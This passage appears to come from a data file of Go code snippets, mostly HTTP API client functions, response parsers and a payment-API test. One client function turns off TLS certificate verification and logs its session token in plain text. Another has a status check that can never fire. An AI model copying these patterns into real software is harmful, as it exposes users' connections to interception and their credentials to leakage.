localVarHttpResponse.Body.Close()\n\t if localVarHttpResponse.StatusCode >= 300 {\n\t\treturn localVarHttpResponse, reportError(localVarHttpResponse.Status)\n\t }\n\n\treturn localVarHttpResponse, err\n}", "func (c *Config) GetResponse(request *http.Request) ([]byte, error) {\n\n\ttoken, err := GetToken(c.ServerIP, c.Port, c.Username, c.Password, c.Scheme)\n\tif err != nil {\n\t\tlog.Println(\"[ERROR] Error in getting token\")\n\t\treturn nil, fmt.Errorf(\"[Error] .\\n Error: %s\", err.Error())\n\t}\n\ttr := &http.Transport{\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t}\n\n\tvar tempURL *url.URL\n\ttempURL, err = url.Parse(c.Scheme + \"://\" + c.ServerIP + \":\" + strconv.Itoa(c.Port) + \"/api/\" + request.URL.String())\n\tif err != nil {\n\t\tlog.Println(\"[Error] URL is not in correct format\")\n\t\treturn nil, fmt.Errorf(\"[Error] Error: %s\", err.Error())\n\t}\n\trequest.URL = tempURL\n\n\tlog.Println(request.URL)\n\tlog.Println(token)\n\tfmt.Println(request.Method)\n\trequest.Header.Set(\"X-RestSvcSessionId\", token)\n\tif request.Method == \"POST\" {\n\t\trequest.Header.Set(\"Accept\", \"application/xml\")\n\t\trequest.Header.Set(\"Content-Type\", \"application/xml\")\n\n\t} else {\n\t\trequest.Header.Set(\"Accept\", \"application/json\")\n\t\trequest.Header.Set(\"Content-Type\", \"application/json\")\n\n\t}\n\n\tclient := &http.Client{Transport: tr}\n\tresp, err := client.Do(request)\n\tif err != nil {\n\t\tlog.Println(\" [ERROR] Do: \", err)\n\t\treturn nil, fmt.Errorf(\"[Error] Error: %s\", err.Error())\n\n\t}\n\n\tif resp.StatusCode >= 200 && resp.StatusCode <= 204 {\n\t\tlog.Println(\"success..\")\n\n\t} else {\n\t\tdata, _ := ioutil.ReadAll(resp.Body)\n\t\treturn nil, fmt.Errorf(\"[Error] Error %d: %s\", resp.StatusCode, strings.ToValidUTF8(string(data), \"\"))\n\t}\n\n\treturn ioutil.ReadAll(resp.Body)\n}", "func ExchangePutPost(service string, method string, urlBase string, urlSuffix string, credentials string, goodHttpCodes []int, body interface{}, structure interface{}) (httpCode int) {\n\turl := urlBase + \"/\" + urlSuffix\n\tapiMsg := method + \" \" + url\n\n\t// get message printer\n\tmsgPrinter := i18n.GetMessagePrinter()\n\n\tVerbose(apiMsg)\n\tif IsDryRun() {\n\t\treturn 201\n\t}\n\n\thttpClient := GetHTTPClient(config.HTTPRequestTimeoutS)\n\tresp := InvokeRestApi(httpClient, method, url, credentials, body, service, apiMsg, make(map[string]string), true)\n\tif resp.Body != nil {\n\t\tdefer resp.Body.Close()\n\t}\n\thttpCode = resp.StatusCode\n\tVerbose(msgPrinter.Sprintf(\"HTTP code: %d\", httpCode))\n\tbodyBytes, err := ioutil.ReadAll(resp.Body)\n\tif !isGoodCode(httpCode, goodHttpCodes) {\n\t\tif err != nil {\n\t\t\tFatal(HTTP_ERROR, msgPrinter.Sprintf(\"failed to read exchange body response from %s: %v\", apiMsg, err))\n\t\t}\n\t\trespMsg := exchange.PostDeviceResponse{}\n\t\terr = json.Unmarshal(bodyBytes, &respMsg)\n\t\tif err != nil {\n\t\t\tFatal(HTTP_ERROR, msgPrinter.Sprintf(\"bad HTTP code %d from %s: %s\", httpCode, apiMsg, string(bodyBytes)))\n\t\t}\n\t\tFatal(HTTP_ERROR, msgPrinter.Sprintf(\"bad HTTP code %d from %s: %s, %s\", httpCode, apiMsg, respMsg.Code, respMsg.Msg))\n\t} else if len(bodyBytes) > 0 && structure != nil { // the DP front-end of exchange will return nothing when auth problem\n\t\tswitch s := structure.(type) {\n\t\tcase *[]byte:\n\t\t\t// This is the signal that they want the raw body back\n\t\t\t*s = bodyBytes\n\t\tcase *string:\n\t\t\t// If the structure to fill in is just a string, unmarshal/remarshal it to get it in json indented form, and then return as a string\n\t\t\t//todo: this gets it in json indented form, but also returns the fields in random order (because they were interpreted as a map)\n\t\t\tvar jsonStruct interface{}\n\t\t\terr = json.Unmarshal(bodyBytes, &jsonStruct)\n\t\t\tif err != nil {\n\t\t\t\tFatal(JSON_PARSING_ERROR, msgPrinter.Sprintf(\"failed to unmarshal exchange body response from %s: %v\", apiMsg, err))\n\t\t\t}\n\t\t\tjsonBytes, err := json.MarshalIndent(jsonStruct, \"\", JSON_INDENT)\n\t\t\tif err != nil {\n\t\t\t\tFatal(JSON_PARSING_ERROR, msgPrinter.Sprintf(\"failed to marshal exchange output from %s: %v\", apiMsg, err))\n\t\t\t}\n\t\t\t*s = string(jsonBytes)\n\t\tdefault:\n\t\t\terr = json.Unmarshal(bodyBytes, structure)\n\t\t\tif err != nil {\n\t\t\t\tFatal(JSON_PARSING_ERROR, msgPrinter.Sprintf(\"failed to unmarshal exchange body response from %s: %v\", apiMsg, err))\n\t\t\t}\n\t\t}\n\t}\n\n\treturn\n}", "func RegisterSubcenter(){\n method := \"PUT\"\n header_m := map[string]string{\"Content-Type\": \"application/x-www-form-urlencoded\"}\n host := getHostName()\n ipOfHost := getIp()\n urlToCenterT := urlToCenter + host\n body_send := \"ttl=\" + ttl + \"&value=\" + ipOfHost + \":21109\"\n //log.Debugf(\"host:%s, ip:%s, urlToCenter:%s, body_send:%s\", host, ipOfHost, urlToCenter, body_send)\n ut.SendHttp(body_send, 3, urlToCenterT, method, header_m)\n}", "func ParsePostCustomersResponse(rsp *http.Response) (*PostCustomersResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &PostCustomersResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\t}\n\n\treturn response, nil\n}", "func (o *CreateUsingPOST2Reader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewCreateUsingPOST2OK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 401:\n\t\tresult := NewCreateUsingPOST2Unauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 403:\n\t\tresult := NewCreateUsingPOST2Forbidden()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 404:\n\t\tresult := NewCreateUsingPOST2NotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 500:\n\t\tresult := NewCreateUsingPOST2InternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (r apiUpdateCustomerSessionV2Request) Execute() (IntegrationStateV2, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPut\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue IntegrationStateV2\n\t)\n\n\tlocalBasePath, err := r.apiService.client.cfg.ServerURLWithContext(r.ctx, \"IntegrationApiService.UpdateCustomerSessionV2\")\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, GenericOpenAPIError{error: err.Error()}\n\t}\n\n\tlocalVarPath := localBasePath + \"/v2/customer_sessions/{customerSessionId}\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"customerSessionId\"+\"}\", _neturl.QueryEscape(parameterToString(r.customerSessionId, \"\")), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif r.body == nil {\n\t\treturn localVarReturnValue, nil, reportError(\"body is required and must be specified\")\n\t}\n\n\tif r.dry != nil {\n\t\tlocalVarQueryParams.Add(\"dry\", parameterToString(*r.dry, \"\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = r.body\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\treq, err := r.apiService.client.prepareRequest(r.ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := r.apiService.client.callAPI(req)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v IntegrationStateV2\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 400 {\n\t\t\tvar v ErrorResponse\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 401 {\n\t\t\tvar v ErrorResponseWithStatus\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 409 {\n\t\t\tvar v map[string]interface{}\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = r.apiService.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (client PrimitiveClient) PutDateResponder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func TestPagarmePaymentCreateWithCard(t *testing.T) {\n \n payment := pagarme.NewPaymentWithCard(1)\n payment.PostbackUrl = \"https://mobilemind.free.beeceptor.com/webhook/pagarme\"\n\n Pagarme := pagarme.NewPagarme(\"pt-BR\", ApiKey, CryptoKey)\n Pagarme.SetDebug()\n\n pagarmeFillPayments(payment)\n\n result, err := Pagarme.PaymentCreate(payment)\n\n if err != nil {\n t.Errorf(\"Erro ao create card payment: %v\", err)\n }else{\n //t.Log(fmt.Sprintf(\"result = %v\", customer.Id)) \n\n\n if result.Id == 0 {\n t.Errorf(\"Id cant be empty\")\n return\n }\n\n if result.Status == api.PagarmeAuthorized {\n\n captureData := pagarme.NewCaptureData(fmt.Sprintf(\"%v\", result.Id), 1)\n\n result, err := Pagarme.PaymentCapture(captureData)\n\n if err != nil {\n t.Errorf(\"Erro ao capture data: %v\", err)\n return\n }\n\n if result.Status != api.PagarmeAuthorized {\n t.Errorf(\"status expected %v, returned %v\", result.Status, api.PagarmeAuthorized)\n return \n }\n\n }\n\n client.Set(\"TransactionId\", result.Id, 0)\n\n }\n\n}", "func ParseChangeaspecificSubscriberResponse(rsp *http.Response) (*ChangeaspecificSubscriberResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &ChangeaspecificSubscriberResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest Subscribers\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func GenerateRestAPI(resp *svcsdk.RestApi) *svcapitypes.RestAPI {\n\tcr := &svcapitypes.RestAPI{}\n\n\tif resp.ApiKeySource != nil {\n\t\tcr.Spec.ForProvider.APIKeySource = resp.ApiKeySource\n\t} else {\n\t\tcr.Spec.ForProvider.APIKeySource = nil\n\t}\n\tif resp.BinaryMediaTypes != nil {\n\t\tf1 := []*string{}\n\t\tfor _, f1iter := range resp.BinaryMediaTypes {\n\t\t\tvar f1elem string\n\t\t\tf1elem = *f1iter\n\t\t\tf1 = append(f1, &f1elem)\n\t\t}\n\t\tcr.Spec.ForProvider.BinaryMediaTypes = f1\n\t} else {\n\t\tcr.Spec.ForProvider.BinaryMediaTypes = nil\n\t}\n\tif resp.CreatedDate != nil {\n\t\tcr.Status.AtProvider.CreatedDate = &metav1.Time{*resp.CreatedDate}\n\t} else {\n\t\tcr.Status.AtProvider.CreatedDate = nil\n\t}\n\tif resp.Description != nil {\n\t\tcr.Spec.ForProvider.Description = resp.Description\n\t} else {\n\t\tcr.Spec.ForProvider.Description = nil\n\t}\n\tif resp.DisableExecuteApiEndpoint != nil {\n\t\tcr.Spec.ForProvider.DisableExecuteAPIEndpoint = resp.DisableExecuteApiEndpoint\n\t} else {\n\t\tcr.Spec.ForProvider.DisableExecuteAPIEndpoint = nil\n\t}\n\tif resp.EndpointConfiguration != nil {\n\t\tf5 := &svcapitypes.EndpointConfiguration{}\n\t\tif resp.EndpointConfiguration.Types != nil {\n\t\t\tf5f0 := []*string{}\n\t\t\tfor _, f5f0iter := range resp.EndpointConfiguration.Types {\n\t\t\t\tvar f5f0elem string\n\t\t\t\tf5f0elem = *f5f0iter\n\t\t\t\tf5f0 = append(f5f0, &f5f0elem)\n\t\t\t}\n\t\t\tf5.Types = f5f0\n\t\t}\n\t\tif resp.EndpointConfiguration.VpcEndpointIds != nil {\n\t\t\tf5f1 := []*string{}\n\t\t\tfor _, f5f1iter := range resp.EndpointConfiguration.VpcEndpointIds {\n\t\t\t\tvar f5f1elem string\n\t\t\t\tf5f1elem = *f5f1iter\n\t\t\t\tf5f1 = append(f5f1, &f5f1elem)\n\t\t\t}\n\t\t\tf5.VPCEndpointIDs = f5f1\n\t\t}\n\t\tcr.Spec.ForProvider.EndpointConfiguration = f5\n\t} else {\n\t\tcr.Spec.ForProvider.EndpointConfiguration = nil\n\t}\n\tif resp.Id != nil {\n\t\tcr.Status.AtProvider.ID = resp.Id\n\t} else {\n\t\tcr.Status.AtProvider.ID = nil\n\t}\n\tif resp.MinimumCompressionSize != nil {\n\t\tcr.Spec.ForProvider.MinimumCompressionSize = resp.MinimumCompressionSize\n\t} else {\n\t\tcr.Spec.ForProvider.MinimumCompressionSize = nil\n\t}\n\tif resp.Name != nil {\n\t\tcr.Spec.ForProvider.Name = resp.Name\n\t} else {\n\t\tcr.Spec.ForProvider.Name = nil\n\t}\n\tif resp.Policy != nil {\n\t\tcr.Spec.ForProvider.Policy = resp.Policy\n\t} else {\n\t\tcr.Spec.ForProvider.Policy = nil\n\t}\n\tif resp.Tags != nil {\n\t\tf10 := map[string]*string{}\n\t\tfor f10key, f10valiter := range resp.Tags {\n\t\t\tvar f10val string\n\t\t\tf10val = *f10valiter\n\t\t\tf10[f10key] = &f10val\n\t\t}\n\t\tcr.Spec.ForProvider.Tags = f10\n\t} else {\n\t\tcr.Spec.ForProvider.Tags = nil\n\t}\n\tif resp.Version != nil {\n\t\tcr.Spec.ForProvider.Version = resp.Version\n\t} else {\n\t\tcr.Spec.ForProvider.Version = nil\n\t}\n\tif resp.Warnings != nil {\n\t\tf12 := []*string{}\n\t\tfor _, f12iter := range resp.Warnings {\n\t\t\tvar f12elem string\n\t\t\tf12elem = *f12iter\n\t\t\tf12 = append(f12, &f12elem)\n\t\t}\n\t\tcr.Status.AtProvider.Warnings = f12\n\t} else {\n\t\tcr.Status.AtProvider.Warnings = nil\n\t}\n\n\treturn cr\n}", "func PostData(header http.Header, bodyOrion map[string]interface{}) error {\n\t// Marshal the mapping to JSON\n\tjsonBody, err := json.Marshal(bodyOrion)\n\tif err != nil {\n\t\treturn errors.New(\"Could not parse the request to JSON\")\n\t}\n\n\tfmt.Printf(\"\\n\\n %s \\n\\n\", jsonBody)\n\n\t// Do the request to\n\tvar statusCode int\n\tstatusCode, err = DoRequestOrion(OrionHost, \"POST\", jsonBody, header)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn err\n\t}\n\n\t// 422 status code indicates that the entity has already been created.\n\t// Therefore, the url and the method must change to append the new measurement\n\tif statusCode == 422 {\n\t\t// Get the new url\n\t\tvar url = OrionHost + \"/\" + bodyOrion[\"id\"].(string) + \"/attrs\"\n\n\t\t// Delete the id and the type from the message's body\n\t\tdelete(bodyOrion, \"id\")\n\t\tdelete(bodyOrion, \"type\")\n\n\t\t// Marshal the new mapping to JSON\n\t\tjsonBody, err := json.Marshal(bodyOrion)\n\t\tif err != nil {\n\t\t\treturn errors.New(\"Could not parse the request to JSON\")\n\t\t}\n\n\t\t// Send the PATCH method that updates the value of the measurement\n\t\tstatusCode, err = DoRequestOrion(url, \"PATCH\", jsonBody, header)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn err\n\t\t}\n\t}\n\n\th := bodyOrion[\"attributes\"].(map[string]interface{})[\"metadata\"].(map[string]interface{})[\"hash\"].(map[string]interface{})[\"value\"].(string)\n\tlogs.Log.Printf(\"Orion Response(%s)\\n%s\\n\", h, fmt.Sprintln(statusCode))\n\n\tif float32(statusCode)/200 < 1 && float32(statusCode)/200 >= 1.5 {\n\t\tfmt.Println(statusCode)\n\t\tlogs.Log.Printf(\"\\nThe status code received is not the expected one: %d\\n\", statusCode)\n\t\treturn errors.New(\"The status code received is not the expected one: \" + fmt.Sprintf(\"%d\", statusCode))\n\t}\n\n\treturn nil\n}", "func ParseInAppPurchasesGetInstanceResponse(rsp *http.Response) (*InAppPurchasesGetInstanceResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer func() { _ = rsp.Body.Close() }()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &InAppPurchasesGetInstanceResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest InAppPurchaseResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 400:\n\t\tvar dest ErrorResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON400 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 403:\n\t\tvar dest ErrorResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON403 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 404:\n\t\tvar dest ErrorResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON404 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func ParseResponse(mapWrapper *cmap.ConcurrentMap, command model.Command, err error, customResponse *model.CustomResponse) model.CustomResponse {\n\n\tresultWrapper := model.Wrapper{\n\t\tConfigure: model.Configure{\n\t\t\tResponse: command,\n\t\t},\n\t\tResponse: cmap.New(),\n\t}\n\n\tresultWrapper.Response.Set(\"statusCode\", 0)\n\tresultWrapper.Response.Set(\"header\", make(map[string]interface{}))\n\tresultWrapper.Response.Set(\"body\", make(map[string]interface{}))\n\n\t//* now we will set the response body based from configurex.json if there is $configure value in configureBased.\n\n\ttmpHeader := make(map[string]interface{})\n\ttmpBody := make(map[string]interface{})\n\n\tstatusCode := 400\n\tif customResponse != nil {\n\t\tif customResponse.Header != nil {\n\t\t\ttmpHeader = customResponse.Header\n\t\t}\n\t\tif customResponse.Body != nil {\n\t\t\ttmpBody = customResponse.Body\n\t\t}\n\n\t\tif customResponse.StatusCode > 0 {\n\t\t\tstatusCode = customResponse.StatusCode\n\n\t\t} else {\n\t\t\tlog.Warn(\"status code is not defined, set status code to 400\")\n\t\t\t// default\n\t\t\tstatusCode = 400\n\n\t\t}\n\t}\n\n\t// if status code is specified in configure, then set status code based on configure\n\tif command.StatusCode > 0 {\n\t\tstatusCode = command.StatusCode\n\t}\n\n\t//*header\n\ttmpHeader = service.AddToWrapper(resultWrapper.Configure.Response.Adds.Header, \"--\", tmpHeader, mapWrapper, 0)\n\t//*modify header\n\ttmpHeader = service.ModifyWrapper(resultWrapper.Configure.Response.Modifies.Header, \"--\", tmpHeader, mapWrapper, 0)\n\t//*Deletion Header\n\ttmpHeader = service.DeletionHeaderOrQuery(resultWrapper.Configure.Response.Deletes.Header, tmpHeader)\n\n\t//*add\n\ttmpBody = service.AddToWrapper(resultWrapper.Configure.Response.Adds.Body, \"--\", tmpBody, mapWrapper, 0)\n\t//*modify\n\ttmpBody = service.ModifyWrapper(resultWrapper.Configure.Response.Modifies.Body, \"--\", tmpBody, mapWrapper, 0)\n\t//* delete\n\ttmpBody = service.DeletionBody(resultWrapper.Configure.Response.Deletes, tmpBody)\n\n\t//*In case user want to log final response\n\tif len(resultWrapper.Configure.Response.LogAfterModify) > 0 {\n\t\tlogValue := make(map[string]interface{}) // v\n\t\tfor key, val := range resultWrapper.Configure.Response.LogAfterModify {\n\t\t\tlogValue[key] = service.GetFromHalfReferenceValue(val, resultWrapper.Response, 0)\n\t\t}\n\t\t//logValue := service.GetFromHalfReferenceValue(resultWrapper.Configure.Response.LogAfterModify, resultWrapper.Response, 0)\n\t\tutil.DoLoggingJson(logValue, \"after\", \"final response\", false)\n\t}\n\n\tresponse := model.CustomResponse{\n\t\tStatusCode: statusCode,\n\t\tHeader: tmpHeader,\n\t\tBody: tmpBody,\n\t\tError: err,\n\t}\n\n\treturn response\n}", "func (c *Client) Do(input Input, output Output) error {\n\n\t// Validate the input.\n\tif err := validator.New().Struct(input); err != nil {\n\t\treturn qberrors.HandleErrorValidation(err)\n\t}\n\n\t// Marshal marshals the request body using Input.marshal.\n\tb, err := input.encode()\n\tif err != nil {\n\t\treturn qberrors.Client(err).Safef(qberrors.InvalidInput, \"error encoding input\")\n\t}\n\n\t// Create the request, using the marshalled input as the body.\n\treq, err := http.NewRequest(input.method(), input.url(), bytes.NewBuffer(b))\n\tif err != nil {\n\t\tserr := qberrors.ErrSafe{Message: \"error creating request\"}\n\t\treturn qberrors.Internal(err).Safe(serr)\n\t}\n\n\t// Add HTTP headers using Input.addHeaders.\n\tinput.addHeaders(req)\n\n\t// Invoke each plugin's PreRequest hook.\n\tc.invokePreRequest(req)\n\n\t// Do the HTTP request.\n\tresp, err := c.HTTPClient.Do(req)\n\tif err != nil {\n\t\tserr := qberrors.ErrSafe{Message: \"error executing request\"}\n\t\treturn qberrors.Service(err).Safe(serr)\n\t}\n\n\t// Invoke each plugin's PostResponse hook.\n\tc.invokePostResponse(resp)\n\n\t// Parse the response body. We do our best to handle this gracefully if\n\t// an error is thrown outside of the API's control plane, e.g., from\n\t// Cloudflare, which might not produce parsable output.\n\tif err := output.decode(resp.Body); err != nil {\n\t\tswitch true {\n\t\tcase resp.StatusCode >= 200 && resp.StatusCode < 300:\n\t\t\tserr := qberrors.ErrSafe{Message: \"error decoding response\"}\n\t\t\treturn qberrors.Internal(err).Safe(serr)\n\t\tcase resp.StatusCode >= 400 && resp.StatusCode < 500:\n\t\t\tserr := qberrors.ErrSafe{Message: http.StatusText(resp.StatusCode), StatusCode: resp.StatusCode}\n\t\t\treturn qberrors.Client(serr).Safe(serr)\n\t\tdefault:\n\t\t\tserr := qberrors.ErrSafe{Message: http.StatusText(resp.StatusCode), StatusCode: resp.StatusCode}\n\t\t\treturn qberrors.Service(serr).Safe(serr)\n\t\t}\n\t}\n\n\t// Handle any errors, the logic of which will depend on whether we are\n\t// consuming the XML or RESTful API.\n\treturn output.handleError(output, resp)\n}", "func (me *CHARGES_IMPL) UpdateChargeDueDate (\r\n chargeId string,\r\n body *models_pkg.ChargesDueDateRequest,\r\n idempotencyKey *string) (*models_pkg.ChargesDueDateResponse, error) {\r\n //the endpoint path uri\r\n _pathUrl := \"/Charges/{charge_id}/due-date\"\r\n\r\n //variable to hold errors\r\n var err error = nil\r\n //process optional template parameters\r\n _pathUrl, err = apihelper_pkg.AppendUrlWithTemplateParameters(_pathUrl, map[string]interface{} {\r\n \"charge_id\" : chargeId,\r\n })\r\n if err != nil {\r\n //error in template param handling\r\n return nil, err\r\n }\r\n\r\n //the base uri for api requests\r\n _queryBuilder := configuration_pkg.BASEURI;\r\n\r\n //prepare query string for API call\r\n _queryBuilder = _queryBuilder + _pathUrl\r\n\r\n //validate and preprocess url\r\n _queryBuilder, err = apihelper_pkg.CleanUrl(_queryBuilder)\r\n if err != nil {\r\n //error in url validation or cleaning\r\n return nil, err\r\n }\r\n //prepare headers for the outgoing request\r\n headers := map[string]interface{} {\r\n \"user-agent\" : \"MundiSDK - Go 2.4.5\",\r\n \"accept\" : \"application/json\",\r\n \"content-type\" : \"application/json; charset=utf-8\",\r\n \"Content-Type\" : \"application/json\",\r\n \"idempotency-key\" : apihelper_pkg.ToString(idempotencyKey, \"\"),\r\n }\r\n\r\n //prepare API request\r\n _request := unirest.PatchWithAuth(_queryBuilder, headers, body, me.config.BasicAuthUserName(), me.config.BasicAuthPassword())\r\n //and invoke the API call request to fetch the response\r\n _response, err := unirest.AsString(_request,false);\r\n if err != nil {\r\n //error in API invocation\r\n return nil, err\r\n }\r\n\r\n //error handling using HTTP status codes\r\n if (_response.Code == 400) {\r\n err = apihelper_pkg.NewAPIError(\"Invalid request\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 401) {\r\n err = apihelper_pkg.NewAPIError(\"Invalid API key\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 404) {\r\n err = apihelper_pkg.NewAPIError(\"An informed resource was not found\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 412) {\r\n err = apihelper_pkg.NewAPIError(\"Business validation error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 422) {\r\n err = apihelper_pkg.NewAPIError(\"Contract validation error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 500) {\r\n err = apihelper_pkg.NewAPIError(\"Internal server error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code < 200) || (_response.Code > 206) { //[200,206] = HTTP OK\r\n err = 